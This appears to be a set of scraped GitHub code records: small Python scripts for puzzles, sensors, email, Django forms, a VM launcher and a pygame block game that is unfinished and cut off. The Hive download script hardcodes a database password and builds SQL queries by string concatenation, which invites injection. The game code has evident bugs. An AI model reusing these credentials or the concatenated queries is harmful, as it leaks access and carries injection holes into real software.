currently playing.\n \"\"\"\n players = __active_players()\n if players:\n return TrayAction.build(\"Pause media\",\n tray_icon_path,\n Gtk.STOCK_MEDIA_PAUSE,\n lambda: __pause_players(players))\n","repo_name":"slgobinath/SafeEyes","sub_path":"safeeyes/plugins/mediacontrol/plugin.py","file_name":"plugin.py","file_ext":"py","file_size_in_byte":1600,"program_lang":"python","lang":"en","doc_type":"code","stars":1330,"dataset":"github-code","pt":"65"} +{"seq_id":"31569758352","text":"from pyhive import hive\nimport pandas as pd\n\n\n# from impala.dbapi import connect\n# from impala.util import as_pandas\n# import sasl\n\ndef download_data():\n out_url = \"/home/data/temp/zzx/data/\"\n conn = hive.Connection(host='192.168.0.150', port=10015, username='hive', password='xwbigdata2022',\n database='standard_db', auth='CUSTOM')\n # conn = hive.Connection(host='192.168.0.150',port=10015,username='ai',password='ai123456',\n # database='standard_db',auth='CUSTOM')\n cursor = conn.cursor()\n cursor.execute(\"SELECT DISTINCT city from standard_db.di_store_dedupe\")\n city_list = cursor.fetchall()\n city_df = pd.DataFrame(city_list, columns=[\"city\"])\n cities = city_df[\"city\"].tolist()\n print(city_list)\n print(\"下载数量:\", len(cities))\n for cityname in cities:\n if cityname is None:\n continue\n print(\"开始执行sql\")\n # cursor.execute(\n # \"select id,name,cname,namepath,citycode,appcode,channeltype_new,category1_new,category2_new,category3_new \"\n # \"from standard_db.di_store_dedupe where appcode <> '高德' and city=\" + \"'\" + cityname + \"'\")\n cursor.execute(\n \"select id,name,cname,namepath,citycode,appcode,channeltype_new,category1_new,category2_new,category3_new \"\n \"from standard_db.di_store_dedupe where city=\" + \"'\" + cityname + \"'\")\n print(\"已经获取数据\")\n data_list = cursor.fetchall()\n df = pd.DataFrame(data_list, columns=[\"id\", \"name\", \"cname\", \"namepath\", \"citycode\", \"appcode\", \"channeltype_new\",\n \"category1_new\",\n \"category2_new\", \"category3_new\"]).set_index(\"id\")\n # df = pd.DataFrame(list)\n # print(df)\n df.to_csv(out_url + cityname + \".csv\")\n print(\"写入完成\", cityname)\n print(\"数据全部更新完成!\")\n cursor.close()\n conn.close()\n\n\nif __name__ == '__main__':\n # 预测���据\n # cities = ['江门市', '新乡市', '河源市', '潮州市', '湛江市', '肇庆市', '开封市', '广州市', '安阳市', '茂名市', '南阳市', '焦作市',\n # '漯河市', '深圳市', '韶关市', '驻马店市', '商丘市', '汕头市', '许昌市', '揭阳市', '郑州市', '汕尾市', '惠州市', '平顶山市',\n # '清远市', '济源市', '洛阳市', '周口市', '云浮市', '珠海市', '三门峡市', '鹤壁市', '信阳市', '佛山市', '梅州市', '濮阳市',\n # '徐州市', '宿迁市', '无锡市', '盐城市', '泰州市', '齐齐哈尔市', '常州市', '黑河市', '大庆市', '镇江市', '扬州市', '鸡西市',\n # '苏州市', '七台河市', '大兴安岭地区', '南通市', '鹤岗市', '南京市', '牡丹江市', '佳木斯市', '绥化市', '伊春市', '淮安市',\n # '双鸭山市', '连云港市', '哈尔滨市', '随州市', '恩施土家族苗族自治州', '武汉市', '宜昌市', '杭州市', '黄冈市', '台州市',\n # '温州市', '咸宁市', '鄂州市', '荆门市', '襄阳市', '舟山市', '神农架林区', '宁波市', '丽水市', '黄石市', '孝感市', '十堰市',\n # '天门市', '荆州市', '仙桃市', '湖州市', '潜江市', '定安县', '本溪市', '辽阳市', '屯昌县', '朝阳市', '铁岭市', '锦州市',\n # '阜新市', '儋州市', '临高县', '白沙黎族自治县', '鞍山市', '文昌市', '海口市', '陵水黎族自治县', '保亭黎族苗族自治县',\n # '乐东黎族自治县', '琼海市', '葫芦岛市', '澄迈县', '万宁市', '五指山市', '三亚市', '丹东市', '抚顺市', '大连市', '益阳市',\n # '昌江黎族自治县', '沈阳市', '三沙市', '北京城区', '营口市', '东方市', '盘锦市', '琼中黎族苗族自治县', '景德镇市',\n # '黔南布依族苗族自治州', '中卫市', '南昌市', '石嘴山市', '贵阳市', '黔东南苗族侗族自治州', '九江市', '吴忠市', '六盘水市',\n # '黔西南布依族苗族自治州', '上饶市', '抚州市', '银川市', '新余市', '毕节市', '吉安市', '遵义市', '铜仁市', '安顺市', '宜春市',\n # '鹰潭市', '固原市', '萍乡市', '赣州市', '滨州市', '潍坊市', '聊城市', '济宁市', '济南市', '青岛市', '东营市', '威海市',\n # '枣庄市', '烟台市', '菏泽市', '泰安市', '临沂市', '淄博市', '德州市', '日照市', '乌兰察布市', '保山市', '呼伦贝尔市',\n # '鄂尔多斯市', '普洱市', '玉溪市', '临沧市', '三明市', '漳州市', '呼和浩特市', '曲靖市', '龙岩市', '迪庆藏族自治州', '通辽市',\n # '楚雄彝族自治州', '宁德市', '泉州市', '阿拉善盟', '大理白族自治州', '南平市', '文山壮族苗族自治州', '丽江市', '包头市',\n # '西双版纳傣族自治州', '乌海市', '昭通市', '怒江傈僳族自治州', '莆田市', '巴彦淖尔市', '厦门市', '德宏傣族景颇族自治州', '昆明市',\n # '红河哈尼族彝族自治州', '兴安盟', '福州市', '赤峰市', '锡林郭勒盟', '澳门', '黄山市', '淮北市', '六安市', '宣城市', '合肥市',\n # '铜陵市', '宿州市', '滁州市', '蚌埠市', '马鞍山市', '亳州市', '芜湖市', '阜阳市', '池州市', '安庆市', '淮南市', '沧州市',\n # '保定市', '衡水市', '邢台市', '廊坊市', '邯郸市', '承德市', '秦皇岛市', '张家口市', '唐山市', '石家庄市', '铜川市',\n # '榆林市', '渭南市', '延安市', '汉中市', '宝鸡市', '安康市', '西安市', '咸阳市', '商洛市', '玉树藏族自治州', '海东市',\n # '巴中市', '辽源市', '延边朝鲜族自治州', '四平市', '遂宁市', '凉山彝族自治州', '海西蒙古族藏族自治州', '绵阳市', '海北藏族自治州',\n # '泸州市', '白山市', '达州市', '眉山市', '阿坝藏族羌族自治州', '吉林市', '黄南藏族自治州', '内江市', '海南藏族自治州', '成都市',\n # '广安市', '自贡市', '通化市', '长春市', '白城市', '南充市', '乐山市', '德阳市', '资阳市', '甘孜藏族自治州', '攀枝花市',\n # '宜宾市', '松原市', '广元市', '雅安市', '果洛藏族自治州', '西宁市', '东莞市', '中山市', '湘潭市', '百色市', '玉林市',\n # '怀化市', '防城港市', '河池市', '梧州市', '岳阳市', '郴州市', '钦州市', '崇左市', '常德市', '株洲市', '北海市', '柳州市',\n # '桂林市', '张家界市', '娄底市', '永州市', '湘西土家族苗族自治州', '长沙市', '来宾市', '衡阳市', '邵阳市', '南宁市', '兰州市',\n # '甘南藏族自治州', '金昌市', '酒泉市', '张掖市', '白银市', '嘉峪关市', '武威市', '天水市', '庆阳市', '临夏回族自治州',\n # '陇南市', '平凉市', '定西市', '忻州市', '吕梁市', '阳泉市', '太原市', '长治市', '运城市', '临汾市', '晋城市', '晋中市',\n # '贵港市', '贺州市', '朔州市', '大同市', '上海城区', '日喀则市', '五家渠市', '昌吉回族自治州', '那曲市', '阿里地区',\n # '胡杨河市', '石河子市', '北屯市', '克拉玛依市', '克孜勒苏柯尔克孜自治州', '乌鲁木齐市', '山南市', '阿克苏地区',\n # '博尔塔拉蒙古自治州', '吐鲁番市', '哈密市', '阿拉尔市', '双河市', '可克达拉市', '林芝市', '铁门关市', '喀什地区', '塔城地区',\n # '天津城区', '伊犁哈萨克自治州', '拉萨市', '和田地区', '巴音郭楞蒙古自治州', '阿勒泰地区', '昆玉市', '图木舒克市', '昌都市',\n # '重庆郊县', '重庆城区', '香港', '阳江市', '金华市', '嘉兴市', '衢州市', '绍兴市']\n download_data()\n","repo_name":"sdgweFGFDHAQ/pycharm_project","sub_path":"workplace/resources/readhive.py","file_name":"readhive.py","file_ext":"py","file_size_in_byte":8193,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"} +{"seq_id":"7168302839","text":"def convert(value):\n raw_l = value['lightsense_mlx75305']\n\n # MCP output code transform factor 0.065 mV/(uW/cm^2): MCP mux\n value_voltage = raw_l * 0.0000625\n # voltage divider factor 5/2 to calc input voltage: voltage divider circuit\n value_voltage_divider = (value_voltage * 5.00) / 2.00\n\n converted_value = (value_voltage_divider - 0.09234) / 0.007 #with gain 1, the factor is 7mA/(uW/cm^2)\n\n converted_value_rounded = round(converted_value, 3)\n\n value['lightsense_mlx75305'] = (converted_value_rounded, 'uW/cm^2')\n # value['lightsense_mlx75305'] = (raw_l, 'raw')\n\n return value\n","repo_name":"waggle-sensor/plugin_manager","sub_path":"plugins/status.plugin/plugin_bin/waggle/protocol/v5/utils/mlx75305.py","file_name":"mlx75305.py","file_ext":"py","file_size_in_byte":614,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"65"} +{"seq_id":"18944364408","text":"import requests\nfrom requests import Response\nfrom requests.exceptions import JSONDecodeError\n\n\nclass AuthorizationError(Exception):\n def __init__(self):\n super().__init__()\n\n\ndef assert_response_is_ok(response: Response):\n if response.status_code == 401:\n raise AuthorizationError\n if not response.ok:\n code = response.status_code\n reason = response.reason\n url = response.url\n raise requests.RequestException(f\"[{code} Error]: {reason} ({url})\")\n\n\ndef assert_response_is_json(response: Response):\n headers = response.headers\n if 'Content-Type' not in headers and 'application/json' not in headers['Content-Type']:\n raise requests.RequestException(f\"[JSON Error]: The response did not reply in JSON format ({response.url})\")\n try:\n response.json()\n except JSONDecodeError as e:\n message = f\"Could not parse into JSON format {response.url}.\\n\"\n message += f\"{response.text}\\n\"\n raise Exception(f\"{message}\\n{e}\")\n\n\ndef assert_response_is_xapi_data(response: Response):\n data = response.json()\n if 'status' not in data:\n message = f\"[XAPI Data Error]: Response data does not match XAPI's data standard ({response.url})\"\n hint = \"[Hint]: Data must be a JSON with keys containing ['status', (optional) 'message', (optional) 'data']\"\n raise requests.RequestException(f\"{message}\\n{hint}\")\n\n\ndef assert_success(response: Response):\n assert_response_is_ok(response)\n assert_response_is_json(response)\n #assert_response_is_xapi_data(response)\n #data = response.json()\n\n #if data['status'] != 'success':\n # raise requests.RequestException(f\"[XAPI Error]: {data['message']} ({response.url})\")\n","repo_name":"mjlomeli/Xbox-SDK","sub_path":"src/xbox_sdk/lib/errors.py","file_name":"errors.py","file_ext":"py","file_size_in_byte":1730,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"} +{"seq_id":"72108193167","text":"# link do zadania\n# https://pl.spoj.com/problems/EUCGAME/\nimport sys, math\n\ndef nwd(a, b):\n c = a % b\n a = b\n b = c\n if b == 0:\n return a\n else:\n return nwd(a, b)\n\nanswers = []\nnumberOfTests = int(sys.stdin.readline())\nfor i in range(numberOfTests):\n tokens = sys.stdin.readline().split(' ')\n a = int(tokens[0])\n b = int(tokens[1])\n answers.append(nwd(a, b)*2)\n\nfor answer in answers:\n sys.stdout.write(str(answer) + '\\n')","repo_name":"GredziszewskiK/spoj","sub_path":"EUCGAME.py","file_name":"EUCGAME.py","file_ext":"py","file_size_in_byte":466,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"} +{"seq_id":"8860070885","text":"from django.conf import settings\nfrom django import forms\nfrom django.core.mail import send_mail, get_connection\n\nclass ContactForm(forms.Form):\n sender = forms.EmailField(label=\"\", widget=forms.TextInput(attrs={ \"id\":\"email_sender\", \"placeholder\": \"Email...\" }))\n cc_myself = forms.BooleanField(required=False, widget=forms.CheckboxInput(attrs={ \"id\":\"email_cc\" }))\n subject = forms.CharField(label=\"\", max_length=100, widget=forms.TextInput(attrs={ \"id\":\"email_subject\", \"placeholder\": \"Subject...\" }))\n message = forms.CharField(label=\"\", widget=forms.Textarea(attrs={ \"id\":\"email_message\", \"placeholder\": \"Your message...\" }))\n\n def send_email(self):\n recipients = [\"nadkarsushant@gmail.com\"]\n if self.cleaned_data[\"cc_myself\"]:\n recipients.append(self.cleaned_data[\"sender\"])\n\n if settings.DEBUG:\n con = get_connection('django.core.mail.backends.console.EmailBackend')\n else:\n con = None\n\n send_mail(\n self.cleaned_data[\"subject\"],\n self.cleaned_data[\"message\"],\n self.cleaned_data[\"sender\"],\n recipients,\n fail_silently=True,\n connection=con,\n )","repo_name":"sushantnadkar/django-personal-website","sub_path":"djangosite/portfolio/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1207,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"} +{"seq_id":"70854410446","text":"import sys\n\nsys.stdin = open(\"_반반.txt\")\n\nT = int(input())\n\nfor t in range(1, T + 1):\n S = input()\n\n al_cnt = {}\n\n for s in S:\n if s in al_cnt:\n al_cnt[s] += 1\n else:\n al_cnt[s] = 1\n \n # result 안에 value 값이 2인 key가\n # 2개가 있으면 참이고, 그 외는 거짓이다\n result = []\n for key, value in al_cnt.items():\n if value == 2:\n result.append(key)\n\n if len(result) == 2:\n print(f'#{t} Yes')\n else:\n print(f'#{t} No')","repo_name":"jejoonlee/TIL-and-Coding-Test","sub_path":"모의고사/20220812/0_반반.py","file_name":"0_반반.py","file_ext":"py","file_size_in_byte":535,"program_lang":"python","lang":"ko","doc_type":"code","stars":9,"dataset":"github-code","pt":"65"} +{"seq_id":"34405779556","text":"#!/bin/python3\n\nfrom email.message import EmailMessage\nimport smtplib\nimport ssl\nfrom datetime import datetime\nfrom time import strftime\nimport read_configuration\nimport gestion_log\n\n\ndef mail_send(reussi=True, objet=read_configuration.objet_reussi):\n \"\"\"Permet d'envoyer le mail\"\"\"\n mail = EmailMessage()\n mail['From'] = read_configuration.email\n mail['To'] = read_configuration.destinataires\n mail['Subject'] = objet\n\n if read_configuration.bool_log:\n gestion_log.Ecrire_rapport(\"Création de la pièce-jointe\")\n body = 'Bonjour,\\nVous trouverez en pièce jointe, le rapport des logs.\\n\\nCeci est un message automatique.'\n mail.set_content(body)\n now = datetime.now()\n f = \"logs/\"+now.strftime(\"%Y-%m-%d\")+\".log\"\n\n mail.add_attachment(open(f, 'rb').read(), 'text', 'plain',\n filename='Rapport.log')\n\n gestion_log.Ecrire_rapport(\"Envoi du mail\")\n context = ssl.create_default_context()\n with smtplib.SMTP_SSL(read_configuration.serveur_smtp, read_configuration.port_smtp, context=context) as smtp:\n smtp.login(read_configuration.email, read_configuration.key)\n smtp.sendmail(mail['From'], mail[\"To\"].split(\",\"), mail.as_string())\n smtp.close()\n return\n","repo_name":"Mohamed-elg/Archive","sub_path":"Main/mail.py","file_name":"mail.py","file_ext":"py","file_size_in_byte":1273,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"} +{"seq_id":"24305526338","text":"def solution(N, number):\n ans = dfs(N, number, 0, 0)\n\n if ans <= 8:\n return ans\n else:\n return -1\n\n\ndef dfs(n, number, curr, depth):\n if depth > 8 or (curr == 0 and depth > 0):\n return 987654321\n if curr == number:\n return depth\n\n next_n, next_depth = 0, depth\n ans = 987654321\n for i in range(8 - depth):\n next_n = next_n * 10 + n\n next_depth += 1\n ans = min(ans,\n dfs(n, number, curr + next_n, next_depth),\n dfs(n, number, curr - next_n, next_depth),\n dfs(n, number, curr * next_n, next_depth),\n dfs(n, number, curr // next_n, next_depth))\n return ans\n\n\nprint(solution(5, 12))\nprint(solution(2, 11))\n\n\n# N + N\n# N - N\n# N * N\n# N / N\n# N * 10 + N\n","repo_name":"cjswo672/Algorithm_python","sub_path":"prev/programmers/level3/N으로_표현.py","file_name":"N으로_표현.py","file_ext":"py","file_size_in_byte":793,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"} +{"seq_id":"42391536754","text":"import asyncio\n\nimport aiohttp\n\nfrom youwol_utils import parse_json\n\nasync def execute():\n\n session = aiohttp.ClientSession()\n file = parse_json(\"./fonts.json\")\n for font in file['fonts']:\n print(font['font-family'])\n url = f\"https://tikzjax.com/bakoma/ttf/{font['font-family']}.ttf\"\n async with await session.get(url=url) as resp:\n if resp.status == 200:\n file = open(f\"./dist/ttf/{font['font-family']}.ttf\", 'wb')\n file.write(await resp.read())\n file.close()\n await session.close()\n\n\nloop = asyncio.get_event_loop()\n\nasyncio.new_event_loop()\nasyncio.run(execute())\n","repo_name":"youwol/cdn-externals","sub_path":"tikzjax/1.0.0/fetch_fonts.py","file_name":"fetch_fonts.py","file_ext":"py","file_size_in_byte":656,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"} +{"seq_id":"36358423577","text":"from atcoder.atcoder_test import def_input, input\n\ninput_text = \"\"\"\ncatredo\n\"\"\"\n\ndef_input(input_text)\n\nfrom collections import deque\n\nif __name__ == \"__main__\":\n s = input()\n\n mp = {}\n\n queue = deque()\n mp[s] = 0\n queue.append(s)\n\n while queue:\n current = queue.popleft()\n if current == \"atcoder\":\n print(mp[current])\n exit()\n\n for i in range(1, 7):\n next = list(current)\n next[i - 1], next[i] = next[i], next[i - 1]\n next = \"\".join(next)\n if next not in mp:\n queue.append(next)\n mp[next] = mp[current] + 1\n","repo_name":"sinchir0/atcoder","sub_path":"220813_contest/4_ans.py","file_name":"4_ans.py","file_ext":"py","file_size_in_byte":643,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"} +{"seq_id":"6040670979","text":"#!/usr/bin/python3\nimport os\nimport subprocess\nimport time\nimport sys\nimport math\n\nclass Timeout(Exception):\n\tpass\n\ndef run(command,timeout = 10):\n\tif isinstance(command,str):\n\t\tcommand = command.split()\n\tproc = subprocess.Popen(command,bufsize=0,stdout=subprocess.PIPE,stderr=subprocess.PIPE)\n\tpoll_seconds = .1\n\tdeadline = time.time()+timeout\n\twhile time.time() < deadline and proc.poll()==None:\n\t\ttime.sleep(poll_seconds)\n\n\tif proc.poll()==None:\n\t\tproc.terminate\n\t\traise Timeout()\n\n\tstdout,stderr = proc.communicate()\n\treturn stdout,stderr,proc.returncode\n\nstdout,stderr,status = run(\"VBoxManage list runningvms\")\nif \"zos\" in stdout.decode('u8'):\n\trun(\"VBoxManage controlvm zos poweroff\")\n\nfin = open(\"/home/zihao/osdev/boot.img\",'rb')\ndata = fin.read()\nfin.close()\nfout = open(\"/home/zihao/VirtualBox VMs/zos/zos-flat.vmdk\",'wb')\nlength = fout.write(data)\n\nif length%512 !=0:\n\tfout.write(b'\\x00'* (512-length%512))\nfout.write(b'\\x00' * (1024*512))\nfout.close()\n\nrun(\"VBoxManage startvm zos\")","repo_name":"zzh8829/ZOS","sub_path":"zos/old/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":995,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"} +{"seq_id":"74874680848","text":"import pygame\r\nimport random\r\nimport sys\r\n# Define some colors\r\nBLACK = (0, 0, 0)\r\nWHITE = (255, 255, 255)\r\nRED = (255, 0, 0)\r\nGREEN = (0, 255, 0)\r\nBLUE = (0, 0, 255)\r\nYELLOW = (255, 255, 0)\r\npygame.font.init()\r\nfont_path = r'C:\\Users\\jddoc\\OneDrive\\Desktop\\Roboto-Regular.ttf'\r\n# Set the dimensions of the grid\r\nSCREEN_WIDTH = 40\r\nSCREEN_HEIGHT = 30\r\n\r\n# Set the size of each block in pixels\r\nBLOCK_SIZE = 30\r\n\r\n# Set the font for displaying the score and timer\r\nFONT_NAME = pygame.font.match_font('arial')\r\nSCORE_FONT = pygame.font.Font(font_path, 30)\r\nTIMER_FONT = pygame.font.Font(font_path, 30)\r\nGAME_OVER_FONT = pygame.font.Font(font_path, 30)\r\n\r\nNUM_ROWS = 8\r\nNUM_COLS = 10\r\nFPS = 60\r\nMAX_TIMER = 5\r\n\r\nclock = pygame.time.Clock()\r\nclock.tick(FPS)\r\nclass Block:\r\n \"\"\"A single block in the grid.\"\"\"\r\n\r\n def __init__(self, color):\r\n self.color = color\r\n\r\n\r\nclass BlockGroup:\r\n \"\"\"A group of four blocks that falls down the grid.\"\"\"\r\n\r\n def __init__(self, blocks):\r\n self.blocks = blocks\r\n \r\n @classmethod\r\n def random(cls):\r\n @classmethod\r\n def random(cls):\r\n x = random.choice(range(6))\r\n y = random.choice(range(6))\r\n block_type = random.choice(list(cls.block_shapes.keys()))\r\n block_color = random.choice(list(cls.block_colors.keys()))\r\n blocks = []\r\n for i in range(2):\r\n for j in range(2):\r\n if cls.block_shapes[block_type][i][j]:\r\n block = Block(cls.block_size, block_color)\r\n block.rect.x = (x + j) * cls.block_size\r\n block.rect.y = (y + i) * cls.block_size\r\n blocks.append(block)\r\n return cls(blocks)\r\n\r\n def __init__(self):\r\n self.blocks = [\r\n Block(random.choice([RED, GREEN, BLUE, YELLOW])),\r\n Block(random.choice([RED, GREEN, BLUE, YELLOW])),\r\n Block(random.choice([RED, GREEN, BLUE, YELLOW])),\r\n Block(random.choice([RED, GREEN, BLUE, YELLOW])),\r\n ]\r\n self.x = 5\r\n self.y = 0\r\n self.rotation = 0\r\n\r\n def rotate(self):\r\n \"\"\"Rotate the block group.\"\"\"\r\n self.rotation = (self.rotation + 1) % 4\r\n\r\n def move_left(self):\r\n \"\"\"Move the block group to the left.\"\"\"\r\n self.x -= 1\r\n\r\n def move_right(self):\r\n \"\"\"Move the block group to the right.\"\"\"\r\n self.x += 1\r\n\r\n def move_down(self):\r\n \"\"\"Move the block group down.\"\"\"\r\n self.y += 1\r\n\r\n\r\nclass BlockGrid:\r\n \"\"\"The grid that contains the blocks.\"\"\"\r\n\r\n def __init__(self, rows, cols):\r\n \"\"\"Initialize the grid with the specified number of rows and columns.\"\"\"\r\n self.rows = rows\r\n self.cols = cols\r\n self.grid = [[None for _ in range(cols)] for _ in range(rows)]\r\n self.current_block = None\r\n self.score = 0\r\n self.timer = clock.tick(FPS)\r\n self.game_over = False\r\n self.screen = pygame.display.set_mode((SCREEN_WIDTH * BLOCK_SIZE, SCREEN_HEIGHT * BLOCK_SIZE))\r\n self.cursor = None\r\n self.num_cleared_blocks = 0\r\n self.blocks = []\r\n\r\n def has_block_over_red_line(self):\r\n for block in self.blocks:\r\n if block.y <= RED_LINE_Y:\r\n return True\r\n return False\r\n\r\n def create_falling_block(self):\r\n \"\"\"Create a new falling block.\"\"\"\r\n self.current_block = BlockGroup.random()\r\n if self.current_block != None:\r\n self.current_block.move(self.cols // 2 - 1, 0)\r\n\r\n def update(self):\r\n \"\"\"Update the game state.\"\"\"\r\n if self.current_block is None:\r\n self.create_falling_block()\r\n\r\n # Check if the current block can move down\r\n if self.current_block != None:\r\n if self.current_block.can_move(0, 1):\r\n self.current_block.move(0, 1)\r\n else:\r\n # The block can't move down, so add it to the grid and create a new falling block\r\n self.current_block.add_to_grid(self.grid)\r\n cleared = self.clear_groups()\r\n self.score += 30 + 10 * (len(cleared) - 1)\r\n self.current_block = None\r\n\r\n # Check if any blocks are above the red line\r\n for col in range(self.cols):\r\n if self.grid[0][col] is not None:\r\n self.timer.count_down()\r\n self.game_over = True\r\n return\r\n\r\n\r\n\r\n def clear_groups(self):\r\n \"\"\"Clear all groups of three or more blocks and return the list of cleared blocks.\"\"\"\r\n groups = self.get_groups()\r\n for group in groups:\r\n for block in group:\r\n block.remove_from_grid(self.grid)\r\n return [block for group in groups for block in group]\r\n\r\n def get_groups(self):\r\n \"\"\"Return a list of all groups of three or more adjacent blocks of the same color.\"\"\"\r\n groups = []\r\n visited = set()\r\n\r\n for row in range(self.rows):\r\n for col in range(self.cols):\r\n block = self.grid[row][col]\r\n if block is not None and block not in visited:\r\n group = self.get_group(block)\r\n if len(group) >= 3:\r\n groups.append(group)\r\n visited.update(group)\r\n\r\n return groups\r\n\r\n def get_group(self, block):\r\n \"\"\"Return the group of adjacent blocks of the same color as the specified block.\"\"\"\r\n color = block.color\r\n visited = {block}\r\n queue = [block]\r\n\r\n while queue:\r\n block = queue.pop(0)\r\n for neighbor in block.get_neighbors(self.grid):\r\n if neighbor not in visited and neighbor.color == color:\r\n visited.add(neighbor)\r\n queue.append(neighbor)\r\n\r\n return visited\r\n\r\n def handle_input(self, key):\r\n \"\"\"Handle user input.\"\"\"\r\n if key == \"left\" and self.current_block.can_move(-1, 0):\r\n self.current_block.move(-1, 0)\r\n elif key == \"right\" and self.current_block.can_move(1, 0):\r\n self.current_block.move(1, 0)\r\n elif key == \"down\" and self.current_block.can_move(0, 1):\r\n self.current_block.move(0, 1)\r\n elif key == \"rotate\":\r\n self.current_block.rotate()\r\n\r\n def draw(self, screen):\r\n \"\"\"Draw the grid on the specified screen.\"\"\"\r\n screen.fill((255, 255, 255))\r\n\r\n # Draw the blocks in the grid\r\n for row in range(self.rows):\r\n for col in range(self.cols):\r\n block = self.grid[row][col]\r\n if block is not None:\r\n rect = pygame.Rect(col * BLOCK_SIZE, row * BLOCK_SIZE, BLOCK_SIZE, BLOCK_SIZE)\r\n pygame.draw.rect(screen, block.color, rect)\r\n\r\n # Draw the falling block\r\n if self.current_block is not None:\r\n for block in self.current_block.blocks:\r\n row, col = block.row + self.current_block.row, block.col + self.current_block.col\r\n rect = pygame.Rect(col * BLOCK_SIZE, row * BLOCK_SIZE, BLOCK_SIZE, BLOCK_SIZE)\r\n pygame.draw.rect(screen, block.color, rect)\r\n\r\n # Draw the cursor\r\n if self.cursor is not None:\r\n rect = pygame.Rect(self.cursor.col * BLOCK_SIZE, self.cursor.row * BLOCK_SIZE, BLOCK_SIZE, BLOCK_SIZE)\r\n pygame.draw.rect(screen, (255, 0, 0), rect, 2)\r\n\r\n # Draw the score\r\n score_text = SCORE_FONT.render(f\"Score: {self.score}\", True, (0, 0, 0))\r\n screen.blit(score_text, (10, 10))\r\n\r\n # Draw the timer\r\n timer_text = TIMER_FONT.render(f\"Time left: {self.timer // FPS}\", True, (0, 0, 0))\r\n screen.blit(timer_text, (10, 50))\r\n\r\n # Draw the game over screen\r\n if self.game_over:\r\n game_over_text = GAME_OVER_FONT.render(\"Game Over\", True, (255, 0, 0))\r\n screen.blit(game_over_text, (SCREEN_WIDTH // 2 - game_over_text.get_width() // 2, SCREEN_HEIGHT // 2 - game_over_text.get_height() // 2))\r\n\r\n pygame.display.flip()\r\n\r\n def handle_input(self):\r\n \"\"\"Handle user input.\"\"\"\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n sys.exit()\r\n elif event.type == pygame.KEYDOWN:\r\n if event.key == pygame.K_LEFT:\r\n self.cursor.col -= 1\r\n elif event.key == pygame.K_RIGHT:\r\n self.cursor.col += 1\r\n elif event.key == pygame.K_UP:\r\n self.rotate_cursor()\r\n elif event.key == pygame.K_DOWN:\r\n self.drop_falling_block()\r\n\r\n def rotate_cursor(self):\r\n \"\"\"Rotate the block that the cursor is pointing to.\"\"\"\r\n row, col = self.cursor.row, self.cursor.col\r\n if self.grid[row][col] is not None:\r\n self.grid[row][col].rotate()\r\n\r\n def drop_falling_block(self):\r\n \"\"\"Drop the falling block into the grid.\"\"\"\r\n if self.falling_block is None:\r\n return\r\n\r\n # Add the falling block to the grid\r\n for block in self.falling_block.blocks:\r\n row, col = block.row + self.falling_block.row, block.col + self.falling_block.col\r\n if row < 0:\r\n self.game_over = True\r\n return\r\n self.grid[row][col] = block\r\n\r\n # Check for completed groups\r\n self.check_groups()\r\n\r\n # Reset the falling block and generate a new one\r\n self.falling_block = None\r\n self.generate_falling_block()\r\n\r\n def check_groups(self):\r\n \"\"\"Check for completed groups and remove them.\"\"\"\r\n for row in range(self.rows):\r\n for col in range(self.cols):\r\n block = self.grid[row][col]\r\n if block is not None:\r\n # Check for a group of 3 blocks with the same color\r\n if self.get_block(row - 1, col) == block and self.get_block(row - 2, col) == block:\r\n # Remove the group of 3 blocks\r\n self.remove_block(row, col)\r\n self.remove_block(row - 1, col)\r\n self.remove_block(row - 2, col)\r\n self.score += 30\r\n # Check for additional blocks that can be removed as a result of this removal\r\n self.check_groups()\r\n elif self.get_block(row, col - 1) == block and self.get_block(row, col - 2) == block:\r\n # Remove the group of 3 blocks\r\n self.remove_block(row, col)\r\n self.remove_block(row, col - 1)\r\n self.remove_block(row, col - 2)\r\n self.score += 30\r\n # Check for additional blocks that can be removed as a result of this removal\r\n self.check_groups()\r\n elif self.get_block(row - 1, col - 1) == block and self.get_block(row - 2, col - 2) == block:\r\n # Remove the group of 3 blocks\r\n self.remove_block(row, col)\r\n self.remove_block(row - 1, col - 1)\r\n self.remove_block(row - 2, col - 2)\r\n self.score += 30\r\n # Check for additional blocks that can be removed as a result of this removal\r\n self.check_groups()\r\n elif self.get_block(row - 1, col + 1) == block and self.get_block(row - 2, col + 2) == block:\r\n # Remove the group of 3 blocks\r\n self.remove_block(row, col)\r\n self.remove_block(row - 1, col + 1)\r\n self.remove_block(row - 2, col + 2)\r\n self.score += 30\r\n # Check for additional blocks that can be removed as a result of this removal\r\n self.check_groups()\r\n\r\n # Update the display\r\n self.draw(self.screen)\r\n pygame.display.flip()\r\n\r\ndef run_game():\r\n # Initialize the game\r\n pygame.init()\r\n screen = pygame.display.set_mode((SCREEN_WIDTH, SCREEN_HEIGHT))\r\n pygame.display.set_caption(\"Block Game\")\r\n clock = pygame.time.Clock()\r\n font = pygame.font.SysFont(None, 30)\r\n matrixImg = pygame.image.load('Screen Shot 2023-03-09 at 5.21.07 PM.png')\r\n screen.blit(matrixImg, (400, 300))\r\n\r\n # Create the block grid\r\n block_grid = BlockGrid(NUM_ROWS, NUM_COLS)\r\n\r\n # Initialize game variables\r\n score = 0\r\n timer = MAX_TIMER\r\n game_over = False\r\n\r\n # Game loop\r\n while not game_over:\r\n # Handle events\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n game_over = True\r\n elif event.type == pygame.KEYDOWN:\r\n if event.key == pygame.K_LEFT:\r\n block_grid.move_left()\r\n elif event.key == pygame.K_RIGHT:\r\n block_grid.move_right()\r\n elif event.key == pygame.K_UP:\r\n block_grid.rotate_clockwise()\r\n elif event.key == pygame.K_DOWN:\r\n 